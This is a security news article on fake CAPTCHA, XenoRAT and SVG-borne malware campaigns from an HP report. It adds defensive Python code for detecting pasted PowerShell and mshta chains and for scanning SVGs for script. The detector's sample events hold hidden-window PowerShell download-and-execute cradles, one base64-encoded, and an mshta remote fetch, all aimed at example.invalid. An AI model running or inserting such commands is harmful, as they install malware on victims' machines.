- The HP Threat Insights report reveals new malware campaigns
- Victims' data is exfiltrated remotely by a remote access Trojan
- Attackers were observed using fake CAPTCHA verification pages
New research says that victims are increasingly being infected with malware thanks to a rise in fake CAPTCHA verification tests, which exploit a growing "click tolerance": users are increasingly accustomed to having to "jump through hoops to authenticate themselves online".
This is not the first report to describe the attack. Security researchers identified fake CAPTCHA pages delivering infostealer malware at the end of 2024, but the latest HP Threat Insights report now warns that the technique is on the rise.
Users were typically directed to attacker-controlled websites and then pushed to complete convincing but fake authentication challenges.
Further campaigns identified
These fake CAPTCHAs typically prompt users to run malicious PowerShell commands on their own device, which install the Lumma Stealer remote access Trojan, a popular infostealer capable of exfiltrating a wide range of sensitive information, such as browser details, email credentials, client data and even cryptocurrency wallets.
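The tell-tale part of this chain is the process tree: the user pastes the command into the Run dialog or a terminal, so the PowerShell (or mshta) process is a child of explorer.exe and carries a hidden-window flag, an execution-policy bypass, a download cradle or a remote URL, sometimes wrapped in -EncodedCommand. The following detection logic is an added example, not code from HP or the report, and runs over constructed Sysmon-style process-creation records (the field names parent/image/cmdline, the example.invalid hostnames and the indicator list are all assumptions of this example):

```python
import base64
import re

# Constructed Sysmon Event ID 1 (process creation) style records for this example;
# they are not telemetry from the HP report. Only the three fields the check
# needs are kept.
def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode()


SAMPLE_EVENTS = [
    # 0: classic fake-CAPTCHA chain pasted into Win+R, so explorer.exe is the parent
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/v.txt).Content"'},
    # 1: same intent hidden behind -EncodedCommand
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoP -NonI -W Hidden -Enc "
                + encode_command("iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    # 2: mshta fetching a remote HTA, also launched from the Run dialog
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/verify.hta"},
    # 3: benign developer use: non-explorer parent, no download cradle
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -ExecutionPolicy Bypass -File build.ps1"},
    # 4: benign interactive shell opened from explorer, no other indicators
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Indicators typical of the pasted one-liner: hidden window, bypassed execution
# policy, a download cradle and a remote URL.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|mshta)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}
# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload so indicators hidden inside it
    are visible to the same regexes. Leaves the line untouched on decode failure."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def score_event(event: dict) -> dict:
    """Return the indicator names that fired and whether the event should alert."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    cmdline = expand_encoded(event["cmdline"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if ENCODED_ARG.search(event["cmdline"]):
        hits.append("encoded_command")
    # explorer.exe as parent means the user launched it by hand (Win+R or a
    # double-click), which is exactly the fake-CAPTCHA flow; require two
    # further indicators to keep ordinary interactive use quiet.
    alert = image in INTERPRETERS and parent == "explorer.exe" and len(hits) >= 2
    return {"hits": hits, "alert": alert}


def find_alerts(events: list) -> list:
    """Indices of events that match the fake-CAPTCHA execution pattern."""
    return [i for i, ev in enumerate(events) if score_event(ev)["alert"]]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, score_event(ev))
    print("alerts:", find_alerts(SAMPLE_EVENTS))  # → alerts: [0, 1, 2]
```

The parent check is what separates this from generic "suspicious PowerShell" rules: a scheduled task or a build server also runs encoded or policy-bypassing commands, but it does not do so as a child of the user's shell. On Windows the same pasted command also leaves a trace in the user's RunMRU registry key, which is a useful second source when process telemetry is missing.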
The spread of fake CAPTCHAs was not the only threat uncovered: attackers were also able to access end users' webcams and microphones through social engineering attacks, mainly using the open-source XenoRAT remote access Trojan to control devices, exfiltrate data and log keystrokes.
At the same time, attackers were observed delivering malicious JavaScript code "inside Scalable Vector Graphic (SVG) images to evade detection". These images open "by default" in browsers, and the embedded code is executed, "offering redundancy and monetization opportunities for the attacker" through remote access tools.
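An SVG file is XML, so the places where it can carry executable code are enumerable: `<script>` elements, `on*` event-handler attributes, `javascript:` URIs in links or animations, and `<foreignObject>` wrappers around HTML. The scanner below is an added example (not HP's tooling or anything from the report) that walks a file and reports each of these; the sample SVGs are constructed for this example and only redirect to a reserved example.invalid hostname:

```python
import xml.etree.ElementTree as ET

# Constructed sample SVGs for this example; none of them comes from the HP report.
# The "malicious" ones only redirect to a reserved .invalid hostname.
CLEAN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
    '<circle cx="5" cy="5" r="4"/></svg>'
)
SCRIPT_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg">'
    "<script>location.href='http://example.invalid/'</script>"
    '<rect width="1" height="1"/></svg>'
)
HANDLER_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'onload="location.href=\'http://example.invalid/\'">'
    '<rect width="1" height="1"/></svg>'
)
HREF_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<a xlink:href="javascript:location.href=\'http://example.invalid/\'">'
    "<text>Click to verify</text></a></svg>"
)


def local_name(qualified: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'; plain names pass through."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_svg(data: str) -> list:
    """Return human-readable findings for every way this SVG could run code when
    opened directly in a browser. An empty list means nothing active was found."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML ({exc}); browsers will not render it as SVG"]
    for el in root.iter():          # iter() walks the root and every descendant
        tag = local_name(el.tag)
        if tag == "script":
            size = len((el.text or "").strip())
            findings.append(f"<script> element with {size} bytes of inline code")
        elif tag == "foreignobject":
            findings.append("<foreignObject> element (can embed arbitrary HTML)")
        for attr, value in el.attrib.items():
            name = local_name(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name}= on <{tag}>")
            if value.strip().lower().startswith("javascript:"):
                findings.append(f"{name}= on <{tag}> is a javascript: URI")
    return findings


def is_passive(data: str) -> bool:
    """True when the SVG can be treated as a plain image."""
    return not scan_svg(data)


if __name__ == "__main__":
    for label, svg in [("clean", CLEAN_SVG), ("script", SCRIPT_SVG),
                       ("handler", HANDLER_SVG), ("href", HREF_SVG)]:
        print(label, scan_svg(svg) or "no active content")
```

Browsers run script inside an SVG only when it is loaded as a document, which is what happens when a user double-clicks an attachment or a link opens it directly; the same file referenced from an `<img>` tag or CSS is rendered without script. That is why the "opens by default in the browser" detail matters and why mail gateways should treat .svg attachments as active content rather than images. For untrusted input, parse with defusedxml instead of the standard ElementTree, which does not defend against entity-expansion attacks.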
"A common thread through these campaigns is the use of obfuscation and anti-analysis techniques to slow down investigations," said Patrick Schläpfer, principal researcher at the HP Security Lab.
"Even simple but effective defence evasion techniques can delay detection and response by security operations teams, making it harder to contain an intrusion. Using methods such as direct system calls, attackers make it more difficult for security tools to catch malicious activity, giving them more time to operate undetected and compromise victims' endpoints."